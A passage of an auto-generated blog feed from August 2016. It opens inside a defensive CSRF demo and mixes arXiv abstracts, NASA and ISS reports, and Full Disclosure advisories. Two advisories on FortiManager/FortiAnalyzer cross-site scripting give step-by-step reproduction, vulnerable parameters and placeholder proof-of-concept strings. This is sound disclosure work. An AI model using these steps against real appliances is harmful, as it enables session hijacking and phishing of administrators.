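    if req["session"] not in SESSIONS:
        return 403
    if p.get("cmd") == "DeleteArea":
        pages.discard(p.get("file"))
    return 200


def handle_protected(req, pages):
    """Same action, but only for a POST that carries this session's token."""
    p = params_of(req)
    if req["session"] not in SESSIONS:
        return 403
    if p.get("cmd") in STATE_CHANGING:
        if req["method"] != "POST":
            return 405                      # state changes never ride on GET
        origin = req["headers"].get("Origin")
        if origin is not None and origin != TRUSTED_ORIGIN:
            return 403                      # browser reported a foreign origin
        if not token_ok(req["session"], req["form"].get("csrf_token")):
            return 403                      # token absent or bound to another session
        pages.discard(p.get("file"))
    return 200


def request(method, url, form=None, origin=None, session="s-admin"):
    """Build a constructed request; the browser attaches the session automatically."""
    headers = {} if origin is None else {"Origin": origin}
    return {"method": method, "url": url, "form": form or {},
            "headers": headers, "session": session}


def demo():
    """Run constructed requests through both handlers: (status, page still present)."""
    delete = {"cmd": "DeleteArea", "file": "Footer"}
    cases = {
        "cross_site_get": request("GET", "/Admin/Extra?cmd=DeleteArea&file=Footer"),
        "cross_site_post": request("POST", "/Admin/Extra", delete,
                                   origin="http://other.example"),
        "post_without_token": request("POST", "/Admin/Extra", delete),
        "token_from_other_session": request(
            "POST", "/Admin/Extra",
            {**delete, "csrf_token": issue_token("s-other")}, origin=TRUSTED_ORIGIN),
        "legitimate_post": request(
            "POST", "/Admin/Extra",
            {**delete, "csrf_token": issue_token("s-admin")}, origin=TRUSTED_ORIGIN),
    }
    results = {}
    for name, req in cases.items():
        for label, handler in (("unprotected", handle_unprotected),
                               ("protected", handle_protected)):
            pages = {"Footer", "Sidebar"}
            results[(label, name)] = (handler(req, pages), "Footer" in pages)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The unprotected handler deletes the page for every case, including the cross-site ones; the protected handler deletes it only for the POST that carries the token issued to the same session.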

I have a new follower on Twitter


Mediasphere
Online solutions for businesses of all sizes. #Induction #Training #CPD #Certification #PerformanceManagement #RiskManagement #HRTech #LMS
Gold Coast, Australia
https://t.co/pyVRW2wfXX
Following: 1533 - Followers: 1524

August 05, 2016 at 03:05AM via Twitter http://twitter.com/mediasphere_au

M63: Sunflower Galaxy Wide Field


The Sunflower Galaxy blooms near the center of this wide field telescopic view. The scene spans about 2 degrees or 4 full moons on the sky toward the loyal constellation Canes Venatici. More formally known as Messier 63, the majestic island universe is nearly 100,000 light-years across, about the size of our own Milky Way Galaxy. Surrounding its bright yellowish core, sweeping spiral arms are streaked with cosmic dust lanes and dotted with star forming regions. A dominant member of a known galaxy group, M63 has faint, extended features that could be the remains of dwarf satellite galaxies, evidence that large galaxies grow by accreting small ones. M63 shines across the electromagnetic spectrum and is thought to have undergone bursts of intense star formation. via NASA http://ift.tt/2akDW0Y

Thursday, August 4, 2016

Anonymous

Anonymous. Aug 04, 2016. World Bank. Racial discrimination in the World Bank is a far more systemic and serious issue than any official is willing to ...

from Google Alert - anonymous http://ift.tt/2aMGymJ
via IFTTT

Anonymous

Anonymous. Anonymous. Quantcast. Copyright 1998-2016 by WE ACT Terms Of Use Privacy Statement. Sign in with Facebook, Twitter or email.

from Google Alert - anonymous http://ift.tt/2aBTZGz
via IFTTT

Paraconsistency and Word Puzzles. (arXiv:1608.01338v1 [cs.AI])

Word puzzles and the problem of their representations in logic languages have received considerable attention in the last decade (Ponnuru et al. 2004; Shapiro 2011; Baral and Dzifcak 2012; Schwitter 2013). Of special interest is the problem of generating such representations directly from natural language (NL) or controlled natural language (CNL). An interesting variation of this problem, and to the best of our knowledge, scarcely explored variation in this context, is when the input information is inconsistent. In such situations, the existing encodings of word puzzles produce inconsistent representations and break down. In this paper, we bring the well-known type of paraconsistent logics, called Annotated Predicate Calculus (APC) (Kifer and Lozinskii 1992), to bear on the problem. We introduce a new kind of non-monotonic semantics for APC, called consistency preferred stable models and argue that it makes APC into a suitable platform for dealing with inconsistency in word puzzles and, more generally, in NL sentences. We also devise a number of general principles to help the user choose among the different representations of NL sentences, which might seem equivalent but, in fact, behave differently when inconsistent information is taken into account. These principles can be incorporated into existing CNL translators, such as Attempto Controlled English (ACE) (Fuchs et al. 2008) and PENG Light (White and Schwitter 2009). Finally, we show that APC with the consistency preferred stable model semantics can be equivalently embedded in ASP with preferences over stable models, and we use this embedding to implement this version of APC in Clingo (Gebser et al. 2011) and its Asprin add-on (Brewka et al. 2015).



from cs.AI updates on arXiv.org http://ift.tt/2axGpm3
via IFTTT

Interacting Conceptual Spaces. (arXiv:1608.01402v1 [cs.AI])

We propose applying the categorical compositional scheme of [6] to conceptual space models of cognition. In order to do this we introduce the category of convex relations as a new setting for categorical compositional semantics, emphasizing the convex structure important to conceptual space applications. We show how conceptual spaces for composite types such as adjectives and verbs can be constructed. We illustrate this new model on detailed examples.



from cs.AI updates on arXiv.org http://ift.tt/2axGO8c
via IFTTT

Quantifier Scope in Categorical Compositional Distributional Semantics. (arXiv:1608.01404v1 [cs.CL])

In previous work with J. Hedges, we formalised a generalised quantifiers theory of natural language in categorical compositional distributional semantics with the help of bialgebras. In this paper, we show how quantifier scope ambiguity can be represented in that setting and how this representation can be generalised to branching quantifiers.



from cs.AI updates on arXiv.org http://ift.tt/2axGOVz
via IFTTT

Stable Models for Infinitary Formulas with Extensional Atoms. (arXiv:1608.01603v1 [cs.LO])

The definition of stable models for propositional formulas with infinite conjunctions and disjunctions can be used to describe the semantics of answer set programming languages. In this note, we enhance that definition by introducing a distinction between intensional and extensional atoms. The symmetric splitting theorem for first-order formulas is then extended to infinitary formulas and used to reason about infinitary definitions. This note is under consideration for publication in Theory and Practice of Logic Programming.



from cs.AI updates on arXiv.org http://ift.tt/2axGrdQ
via IFTTT

Query Answering in Resource-Based Answer Set Semantics. (arXiv:1608.01604v1 [cs.AI])

In recent work we defined resource-based answer set semantics, which is an extension to answer set semantics stemming from the study of its relationship with linear logic. In fact, the name of the new semantics comes from the fact that in the linear-logic formulation every literal (including negative ones) was considered as a resource. In this paper, we propose a query-answering procedure reminiscent of Prolog for answer set programs under this extended semantics as an extension of XSB-resolution for logic programs with negation. We prove formal properties of the proposed procedure.

Under consideration for acceptance in TPLP.



from cs.AI updates on arXiv.org http://ift.tt/2aUPEAr
via IFTTT

Deploying learning materials to game content for serious education game development: A case study. (arXiv:1608.01611v1 [cs.AI])

The ultimate goals of serious education games (SEG) are to facilitate learning and maximize enjoyment while playing SEGs. In SEG development, there are normally two spaces to be taken into account: knowledge space regarding learning materials and content space regarding games to be used to convey learning materials. How to deploy the learning materials seamlessly and effectively into game content becomes one of the most challenging problems in SEG development. Unlike previous work where experts in education have to be used heavily, we proposed a novel approach that works toward minimizing the efforts of education experts in mapping learning materials to content space. For a proof-of-concept, we apply the proposed approach in developing an SEG game, named Chem Dungeon, as a case study in order to demonstrate the effectiveness of our proposed approach. This SEG game has been tested with a number of users, and the user survey suggests our method works reasonably well.



from cs.AI updates on arXiv.org http://ift.tt/2axHn1H
via IFTTT

Black-Box Policy Search with Probabilistic Programs. (arXiv:1507.04635v4 [stat.ML] UPDATED)

In this work, we explore how probabilistic programs can be used to represent policies in sequential decision problems. In this formulation, a probabilistic program is a black-box stochastic simulator for both the problem domain and the agent. We relate classic policy gradient techniques to recently introduced black-box variational methods which generalize to probabilistic program inference. We present case studies in the Canadian traveler problem, Rock Sample, and a benchmark for optimal diagnosis inspired by Guess Who. Each study illustrates how programs can efficiently represent policies using moderate numbers of parameters.



from cs.AI updates on arXiv.org http://ift.tt/1gErlEI
via IFTTT

"Why Should I Trust You?": Explaining the Predictions of Any Classifier. (arXiv:1602.04938v2 [cs.LG] UPDATED)

Despite widespread adoption, machine learning models remain mostly black boxes. Understanding the reasons behind predictions is, however, quite important in assessing trust, which is fundamental if one plans to take action based on a prediction, or when choosing whether to deploy a new model. Such understanding also provides insights into the model, which can be used to transform an untrustworthy model or prediction into a trustworthy one. In this work, we propose LIME, a novel explanation technique that explains the predictions of any classifier in an interpretable and faithful manner, by learning an interpretable model locally around the prediction. We also propose a method to explain models by presenting representative individual predictions and their explanations in a non-redundant way, framing the task as a submodular optimization problem. We demonstrate the flexibility of these methods by explaining different models for text (e.g. random forests) and image classification (e.g. neural networks). We show the utility of explanations via novel experiments, both simulated and with human subjects, on various scenarios that require trust: deciding if one should trust a prediction, choosing between models, improving an untrustworthy classifier, and identifying why a classifier should not be trusted.



from cs.AI updates on arXiv.org http://ift.tt/1VlBpRg
via IFTTT

Coordination in Categorical Compositional Distributional Semantics. (arXiv:1606.01515v2 [cs.CL] UPDATED)

An open problem with categorical compositional distributional semantics is the representation of words that are considered semantically vacuous from a distributional perspective, such as determiners, prepositions, relative pronouns or coordinators. This paper deals with the topic of coordination between identical syntactic types, which accounts for the majority of coordination cases in language. By exploiting the compact closed structure of the underlying category and Frobenius operators canonically induced over the fixed basis of finite-dimensional vector spaces, we provide a morphism as representation of a coordinator tensor, and we show how it lifts from atomic types to compound types. Linguistic intuitions are provided, and the importance of the Frobenius operators as an addition to the compact closed setting with regard to language is discussed.



from cs.AI updates on arXiv.org http://ift.tt/214gZil
via IFTTT

Ravens: Justin Tucker thinks he can make field goal from 84.5 yards "if the situation is prime"; NFL record is 64 yards (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Bekanntmachung

Artist: Anonymous. Date: ca. 1914. Medium: Commercial lithograph. Dimensions: Sheet: 19 5/8 × 15 11/16 in. (49.8 × 39.8 cm). Classifications: Prints ...

from Google Alert - anonymous http://ift.tt/2ayJZh6
via IFTTT

[FD] Stored Cross-Site Scripting vulnerability in Count per Day WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting in Count per Day WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting in FormBuilder WordPress Plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting vulnerability in Events Made Easy WordPress plugin

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Ravens: DE Bronson Kaufusi, a 2016 3rd-round pick, will miss season after breaking his ankle in Thursday's practice (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Gagliano Alexandre
innovateur-entrepreneur-marketeur- digitalizer@CX@Oracle
France&Spain
https://t.co/bxTvEtGnVk
Following: 4255 - Followers: 2973

August 04, 2016 at 11:20AM via Twitter http://twitter.com/alex_gagliano

Anonymous

Anonymous. Activity. Anonymous published Crossed Out Email Addresses in FAQs. posted 1 day ago. Quantcast. Sign in to NationBuilder.com.

from Google Alert - anonymous http://ift.tt/2aAaCTh
via IFTTT

ISS Daily Summary Report – 08/03/2016

Fluid Shifts Operations In the Service Module: With ground team assistance, crewmembers configured the Optical Coherence Tomography (OCT) hardware, the Cerebral and Cochlear Fluid Pressure (CCFP) analyzer, and the Distortion Product Otoacoustic Emission (DPOAE) hardware before conducting a DPOAE test, OCT exam, and the Tonometry exam. The scheduled CCFP test was not completed due to software issues that could not be resolved during the Chibis session. However ground teams confirmed that the OCT, Tonometry and DPOAE exams were successfully completed. The purpose of this investigation is to characterize the space flight-induced fluid shift, including intra- and extravascular shifts, intra- and extracellular shifts, changes in total body water and lower vs. upper body shifts. Noninvasive techniques are used to assess arterial and venous dimensions and flow parameters, ocular pressure and structure, and changes in intracranial pressure. Lower body negative pressure is being investigated for its ability to mitigate some of the effects of the space flight-induced fluid shift. Results from this investigation are expected to help define the causes of the ocular structure and vision changes associated with long duration space flight and assist in the development of countermeasures.  Heart Cells Microscope Operations: The crew set up the Heart Cells microscope, removed the BioCell Habitat from the Space Automated Bioproduct Lab (SABL) and the Multiwell BioCell from the BioCell Habitat and inserted into the microscope before completing Heart Cells operations. The Heart Cells investigation studies the human heart, specifically how heart muscle tissue, contracts, grows and changes (gene expression) in microgravity and how those changes vary between subjects. Understanding how heart muscle cells, or cardiomyocytes, change in space improves efforts for studying disease, screening drugs and conducting cell replacement therapy for future space missions.  
Mouse Epigenetics Cage Unit Maintenance: The crew completed standard maintenance activities for the Mouse Epigenetics experiment by exchanging the food cartridge of the Mouse Habitat Cage Unit which is located in the Cell Biology Experiment Facility (CBEF). The Mouse Epigenetics investigation studies altered gene expression patterns in the organs of male mice that spend one month in space, and also examines changes in the deoxyribonucleic acid (DNA) of their offspring. Results from the investigation identify genetic alterations that happen after exposure to the microgravity environment of space. Dose Tracker: The crew completed entries for medication tracking today. This investigation documents the medication usage of crewmembers before and during their missions by capturing data regarding medication use during spaceflight, including side effect qualities, frequencies and severities. The data is expected to either support or counter anecdotal evidence of medication ineffectiveness during flight and unusual side effects experienced during flight. It is also expected that specific, near-real-time questioning about symptom relief and side effects will provide the data required to establish whether spaceflight-associated alterations in pharmacokinetics (PK) or pharmacodynamics (PD) is occurring during missions. NanoRacks External Platform (NREP) Preparation: In preparation for tomorrow’s NREP installation operations on the Japanese Experiment Module (JEM) Airlock (JEMAL) Slide Table, the crew reviewed operation information and gathered hardware to support NREP assembly activities. Extravehicular Activity Mobility Unit (EMU) checkout: The crew retrieved Extravehicular Activity Mobility Unit (EMU) 3006 which was delivered on SpX-9 and installed it on the Forward EMU Don/Doff Assembly (EDDA). The crew then performed an initial checkout of EMU systems to confirm suit 3006 as a viable spare prior to returning the previous spare (EMU 3005) on SpaceX-9.  
Patch Uplink for ETCS Loop Startup Freeze Protection:  Ground teams uplinked a patch to the EXT and S0 MDMs.  This patch provides a Fault Detection, Isolation, & Recovery (FDIR) to limit the amount of time that cold ammonia can flow through the External Thermal Control System (ETCS) during startup, to prevent the Interface Heat Exchanger (IFHX) from freezing if there is cold ammonia flowing through the ETCS with stagnant water present in the IFHX. The new FDIR will cut power to the pumps when this timer expires and stop the flow of ammonia. The new FDIR has been enabled.  Wastewater Storage Tank Assembly (WSTA) Drain and Multifiltration (MF) Bed #2 Effluent Sample The Urine Processor Assembly (UPA) WSTA was drained into an EDV and subsequently refilled. A sample will be taken from this EDV later this week to address high conductivity seen in the UPA. The Water Processor Assembly (WPA) MF bed was also drained so that a sample could be taken to address high conductivity in the WPA. After the sample was collected, WPA was put back in standby. Both samples will be returned to ground on SpaceX-9. On Board Training (OBT) Medical Emergency: The 47S crew participated in this training which provides the opportunity to review procedures, hardware and communication methods necessary to manage a medical emergency. Specific topics covered included: Emergency medical hardware configuration and desired deployment locations. Individual preference for performing chest compressions in microgravity. Crew communication and coordination of care during an emergency medical event. Today’s Planned Activities All activities were completed unless otherwise noted. FLUID SHIFTS. OCT Setup in SM FLUID SHIFTS. Comm configuration for the experiment / r/g 9995 FLUID SHIFTS. Gathering and Connecting Equipment for TV coverage FLUID SHIFTS. Connecting OCT Laptop to RS BRI and HRF PC to ППС-26 (Instead of RSE-Med) r/g 2978 CASKAD. 
Manual Mixing in Bioreactor / r/g 2888 Acoustic Dosimeter Setup Day 2 FLUID SHIFTS. OCT Power up in SM Soyuz 731 Samsung Tablet Recharge, Initiate MOUSE Gather Hardware for the Experiment LDST. Drawer Installation FLUID SHIFTS. TONO Hardware setup in SM Dust Filter Replacement and MRM1 Gas-Liquid Heat Exchanger (ГЖТ) Cleaning On-orbit Hearing Assessment using EARQ FLUID SHIFTS. CCFP Activation and Settings Adjustments in RS [Aborted] Multi Omics. Item gathering MCRSCPE Hardware Setup FLUID SHIFTS. DPOAE Setup in SM DOSETRK iPad data entry FLUID SHIFTS. Chibis Setup / r/g 2979 FLUID SHIFTS. Operator Assistance with Chibis and Gamma-1 r/g 2979 XF305 Camcorder Settings Adjustment FLUID SHIFTS. Gathering Data in SM, Subject  [CCFP activity aborted] FLUID SHIFTS. Gathering Data in SM, Operator  [CCFP activity aborted] Mouse Habitat Cage Unit Maintenance, Refilling water and exchanging Food Cartridge   [Water refill […]

from ISS On-Orbit Status Report http://ift.tt/2akAhAf
via IFTTT

Lambda (anonymous/first class procedures) and custom reporters

Lambda (anonymous/first class procedures) and custom reporters. birdoftheday wrote: Jonathan50 wrote: So the report block is a reporter…? It reports ...

from Google Alert - anonymous http://ift.tt/2aRlH34
via IFTTT

[FD] FortiManager (Series) - (Bookmark) Persistent Vulnerability

Document Title:
===============
FortiManager (Series) - (Bookmark) Persistent Vulnerability

References (Source):
====================
http://ift.tt/2aUdRqX

Fortinet PSIRT ID: 1624461

Release Notes 1: http://ift.tt/1rpfA9Y
Release Notes 2: http://ift.tt/25X4c8e
Release Notes 3: http://ift.tt/2ak3USy

Release Date:
=============
2016-08-04

Vulnerability Laboratory ID (VL-ID):
====================================
1685

Common Vulnerability Scoring System:
====================================
3.8

Product & Service Introduction:
===============================
FortiManager appliances allow you to centrally manage any number of Fortinet devices, from several to thousands, including FortiGate®, FortiWiFi™, FortiCarrier™, FortiMail™ and FortiAnalyzer™ appliances and virtual appliances, as well as FortiClient™ endpoint security agents. You can further simplify control and management of large deployments by grouping devices and agents into administrative domains (ADOMs).

The FortiManager family of management appliances provides centralized policy-based provisioning, device configuration, and update management for FortiGate, FortiWiFi, and FortiMail appliances, and FortiClient end-point security agents, plus end-to-end network monitoring and device control. FortiManager delivers a lower TCO for Fortinet implementations by minimizing both initial deployment costs and ongoing operating expenses.

Control administrative access and simplify policy deployment using role-based administration to define user privileges for specific management domains and functions, and aggregating collections of Fortinet appliances and agents into independent management domains. In addition, by locally hosting security content updates for managed devices and agents, FortiManager appliances minimize Web filtering rating request response time and maximize network protection.

(Copy of the Vendor Homepage: http://ift.tt/225kwMQ )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a persistent web validation vulnerability in the official Fortinet FortiManager appliance product series. The issue affects the web-application of the appliance series and is present in the following FortiManager models - 200D, 300D, 1000D, 3900E, 4000E, Virtual Appliances Version and FortiMoM-VM. The FortiManager legacy models 100, 100C, 400A, 400B, 400C, 1000C, 3000C and 4000D are affected as well by the vulnerability.

Vulnerability Disclosure Timeline:
==================================
2016-01-25: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-01-26: Vendor Notification (FortiGuard Security Team)
2016-02-15: Vendor Response/Feedback (FortiGuard Security Team)
2016-04-08: Vendor Fix/Patch (Fortinet Developer Team)
2016-05-22: Vendor Fix/Patch (Fortinet Developer Team)
2016-07-13: Security Bulletin (FortiGuard Security Team) [Acknowledgements]
2016-08-04: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Fortinet
Product: FortiManager - Appliance (Web-Application) 200D, 300D, 1000D, 3900E, 4000E, Virtual Appliances Versio

Fortinet
Product: FortiManager - Appliance (Web-Application) Legacy - 100, 100C, 400A, 400B, 400C, 1000C, 3000C & 4000

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A persistent and non-persistent input validation web vulnerability has been discovered in the official Fortinet FortiManager appliance product series. The vulnerability allows privileged guest user accounts and restricted user accounts to inject their own malicious script code on the application-side or client-side of the FortiManager appliance web-application series.

The vulnerability is located in the `name and description` input fields of the vulnerable `Policy & Objects - Security Profiles - SSL VPN Portal` module. The request method to inject is POST to GET and the attack vector is located on the application-side of the appliance web-application. Remote attackers are able to inject their own malicious script code into the name and description input fields. After the entry is added, the code bypasses the regular web filter of the appliance web-application and finally executes in the pre-defined bookmarks listing module above, with the basic input.

The vulnerability can be exploited by guest appliance user accounts with restricted access. The vulnerability first executes with a client-side attack vector and becomes persistent with the save procedure by return.

The security risk of the application-side and client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the application-side web vulnerability requires a low privileged guest web-application user account and low user interaction. Successful exploitation of the vulnerability results in persistent phishing, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or connected web module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Policy & Objects - Security Profiles - SSL VPN Portal

Vulnerable Parameter(s):
[+] name
[+] description

Affected Module(s):
[+] Predefined Bookmarks - [Create] Listing

Affected Serie(s):

FortiManager
[+] FortiManager 200D
[+] FortiManager 300D
[+] FortiManager 1000D
[+] FortiManager 3900E
[+] FortiManager-4000E
[+] FortiManager Virtual Appliances
[+] FortiMoM-VM

FortiManager Legacy Models
[+] FortiManager 100
[+] FortiManager 100C
[+] FortiManager 400A
[+] FortiManager 400B
[+] FortiManager 400C
[+] FortiManager 1000C
[+] FortiManager 3000C
[+] FortiManager 4000D

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by low privileged guest web-application user accounts with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability as guest user with restricted access privileges ...
1. Login to the fortimanager appliance web-application as guest user
2. Open the following section that is not restricted to guests mainly (http://ift.tt/2ak56VG)
3. Click Security Profiles > SSL VPN Portal
4. Now click the pre-defined Bookmarks button ahead to the listing
5. Add your test payload to verify the issue in the Name and Description input field
6. Save the entry
7. The code executes in the Pre-Defined Bookmarks listing context in two locations
8. Save the entry by return again
9. Now you reopen the post to edit the pre-defined bookmarks
10. A second execution of the payload occurs in the edit form next to the category entry
11. Successful reproduce of the persistent vulnerability!

PoC: Source #1 - Policy & Objects > Security Profiles > SSL VPN Portal > Predefined Bookmarks > [Create] Listing
<"[PERSISTENT SCRIPT CODE EXECUTION!]">

PoC: Source #2 - Edit Form (Category)
<"<[PERSISTENT SCRIPT CODE EXECUTION!] sr"="" maxlength="35" style="position:static;background: url(/resource/images/tabOption.gif) center right no-repeat #FFF;">
Name Type Location Description
Bookmarks
"> <"<[PERSISTENT SCRIPT CODE EXECUTION!]"
"><"<[PERSISTENT SCRIPT CODE EXECUTION!]>" SSH benjamin-km [PERSISTENT SCRIPT CODE EXECUTION!]
Name <"<[PERSISTENT SCRIPT CODE EXECUTION!]" maxlength=35 >
Type
Location
Remote Port
Listening Port
Screen Width
Screen Height
Logon User
Password
Keyboard Layout
Description <"<[PERSISTENT SCRIPT CODE EXECUTION!]>" maxlength=128>
Full Screen Mode
Display Status
SSO
Field Name Value


Source: Gmail -> IFTTT-> Blogger
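
Output encoding at the two sinks the advisory names, the bookmarks listing and the edit-form input, as an added example (not Fortinet's code and not part of the advisory). The markup, the function names and the benign test value are constructed; 35 and 128 are the `maxlength` values visible in the PoC source.

```python
from html import escape
from html.parser import HTMLParser

MAX_NAME, MAX_DESC = 35, 128    # maxlength values shown in the advisory's edit form

# Constructed markup standing in for the listing row and the edit form.
ROW = "<tr><td>{name}</td><td>{desc}</td></tr>"
FORM = ('<input name="name" value="{name}" maxlength="35">'
        '<input name="description" value="{desc}" maxlength="128">')


def validate(name, desc):
    """Server-side length check; maxlength only constrains the browser form."""
    return len(name) <= MAX_NAME and len(desc) <= MAX_DESC


def render(name, desc, encode=True):
    """Render both sinks. With encode=False the stored value is emitted verbatim."""
    if encode:
        # quote=True also encodes " and ', which matters inside value="..."
        name, desc = escape(name, quote=True), escape(desc, quote=True)
    return ROW.format(name=name, desc=desc) + FORM.format(name=name, desc=desc)


class _Elements(HTMLParser):
    """Collect every start tag the markup produces, with its attributes."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        self.found.append((tag, dict(attrs)))


def elements(markup):
    """Return [(tag, attrs), ...] as an HTML parser sees the rendered markup."""
    parser = _Elements()
    parser.feed(markup)
    parser.close()
    return parser.found


if __name__ == "__main__":
    stored_name = '"><b>x</b>'      # benign constructed value that closes an attribute
    for mode in (False, True):
        print("encoded" if mode else "verbatim",
              [tag for tag, _ in elements(render(stored_name, "ok", encode=mode))])
```

Emitted verbatim, the stored value adds `<b>` elements in both the listing and the form and cuts the `maxlength` attribute off the input; encoded, the parser sees only the intended elements and the input's value round-trips unchanged.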

[FD] FortiAnalyzer & FortiManager - Client Side Cross Site Scripting Web Vulnerability

Document Title:
===============
FortiAnalyzer & FortiManager - Client Side Cross Site Scripting Web Vulnerability

References (Source):
====================
http://ift.tt/1txJKtF

Fortinet PSIRT ID: 1624489

Release Notes 1: http://ift.tt/25X4c8e
Release Notes 2: http://ift.tt/2ak3USy
Release Notes 3: http://ift.tt/2b4F1Hp
Release Notes 4: http://ift.tt/1rpfA9Y

Release Date:
=============
2016-08-03

Vulnerability Laboratory ID (VL-ID):
====================================
1686

Common Vulnerability Scoring System:
====================================
3

Product & Service Introduction:
===============================
FortiManager appliances allow you to centrally manage any number of Fortinet devices, from several to thousands, including FortiGate®, FortiWiFi™, FortiCarrier™, FortiMail™ and FortiAnalyzer™ appliances and virtual appliances, as well as FortiClient™ endpoint security agents. You can further simplify control and management of large deployments by grouping devices and agents into administrative domains (ADOMs). The FortiManager family of management appliances provides centralized policy-based provisioning, device configuration, and update management for FortiGate, FortiWiFi, and FortiMail appliances, and FortiClient end-point security agents, plus end-to-end network monitoring and device control. FortiManager delivers a lower TCO for Fortinet implementations by minimizing both initial deployment costs and ongoing operating expenses. Control administrative access and simplify policy deployment using role-based administration to define user privileges for specific management domains and functions, and aggregating collections of Fortinet appliances and agents into independent management domains. In addition, by locally hosting security content updates for managed devices and agents, FortiManager appliances minimize Web filtering rating request response time and maximize network protection.

(Copy of the Vendor Homepage: http://ift.tt/225kwMQ )

FortiAnalyzer Network Security Logging, Analysis, and Reporting Appliances securely aggregate log data from Fortinet Security Appliances. A comprehensive suite of easily customizable reports allows you to quickly analyze and visualize network threats, inefficiencies and usage. FortiAnalyzer is one of several versatile Fortinet Management Products that provide a diversity of deployment types, growth flexibility, advanced customization through APIs and simple licensing.

(Copy of the Vendor Homepage: http://ift.tt/2ak3knR )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a non-persistent web validation vulnerability in the official Fortinet FortiManager & FortiAnalyzer appliance product series.

Vulnerability Disclosure Timeline:
==================================
2016-01-25: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-01-26: Vendor Notification (FortiGuard Security Team)
2016-03-12: Vendor Response/Feedback (FortiGuard Security Team)
2016-03-17: Vendor Fix/Patch #1 (Fortinet Service Developer Team)
2016-07-28: Vendor Fix/Patch #2 (Fortinet Service Developer Team)
2016-08-03: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Fortinet Product: FortiManager - Appliance (Web-Application) 200D, 300D, 1000D, 3900E, 4000E, Virtual Appliances Versio
Fortinet Product: FortiManager - Appliance (Web-Application) Legacy - 100, 100C, 400A, 400B, 400C, 1000C, 3000C & 4000
Fortinet Product: FortiAnalyzer - Appliance (Web-Application) 200D, 300D, 1000D, 2000D, 3000E, 3500E, 3900E, VM Base & VM

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Fortinet FortiManager and FortiAnalyzer appliance web-application. The vulnerability allows remote attackers to inject their own script code into client-side browser requests of the affected vulnerable web-application context module.

The vulnerability is located in the `tabs` and `&url` values of the `tabs.htm` file. Remote attackers are able to inject malicious script code into the client-side of the vulnerable docroot module. The request method to inject is GET and the attack vector is located on the client-side of the appliance web-application. The issue affects the FortiManager and the FortiAnalyzer appliance web-application model series.

The security risk of the client-side cross site scripting web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.0. Exploitation of the application-side web vulnerability requires no privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in non-persistent phishing, session hijacking, non-persistent external redirect to malicious sources and client-side manipulation of affected or connected web module context.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./cgi-bin/module/docroot/

Vulnerable File(s):
[+] tabview.htm

Vulnerable Parameter(s):
[+] tabs + &urls

Affected Serie(s): FortiManager
[+] FortiManager 200D
[+] FortiManager 300D
[+] FortiManager 1000D
[+] FortiManager 3900E
[+] FortiManager 4000E
[+] FortiManager Virtual Appliances
[+] FortiMoM-VM

FortiManager Legacy Models
[+] FortiManager 100
[+] FortiManager 100C
[+] FortiManager 400A
[+] FortiManager 400B
[+] FortiManager 400C
[+] FortiManager 1000C
[+] FortiManager 3000C
[+] FortiManager 4000D

Affected Serie(s): FortiAnalyzer
[+] FortiAnalyzer 200D
[+] FortiAnalyzer 300D
[+] FortiAnalyzer 1000D
[+] FortiAnalyzer 2000B
[+] FortiAnalyzer 3000E
[+] FortiAnalyzer 3500E
[+] FortiAnalyzer 3900E
[+] FortiAnalyzer VM Base
[+] FortiAnalyzer VM GB1
[+] FortiAnalyzer VM GB5
[+] FortiAnalyzer VM GB25
[+] FortiAnalyzer VM GB100
[+] FortiAnalyzer VM GB500
[+] FortiAnalyzer VM GB2000

Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers without a privileged web-application user account and with low or medium user interaction. For security demonstration or to reproduce the web vulnerability, follow the provided information and steps below.

PoC: Example(s)
http://ift.tt/2b4ERQm SIDE CROSS SITE SCRIPTING VULNERABILITY!]&tabviewid=dvmtabview&ids=fromdvm=1&i=aa
http://ift.tt/2ak3P1b SIDE CROSS SITE SCRIPTING VULNERABILITY!]&tabviewid=dvmtabview&ids=fromdvm=1&i=aa

PoC: #1 - Fortimanager
http://ift.tt/2b4F1r8
http://ift.tt/2ak3onf

PoC: #2 - Fortianalyzer
http://ift.tt/2b4EghC
http://ift.tt/2ak3Vph

Source: Gmail -> IFTTT-> Blogger

Prev - Next doesn't work for Anonymous user

But as an anonymous user it is not present, also when we "Inspect Element" we receive errors in console. For errors, please see attached screenshot.

from Google Alert - anonymous http://ift.tt/2ajTwtZ
via IFTTT

I have a new follower on Twitter


Sachin Ghai
technology creator, adopter... current interests BigData and hadoop sphere...

https://t.co/OgktS2H9bL
Following: 844 - Followers: 675

August 04, 2016 at 01:38AM via Twitter http://twitter.com/sachinghai

Behold the Universe


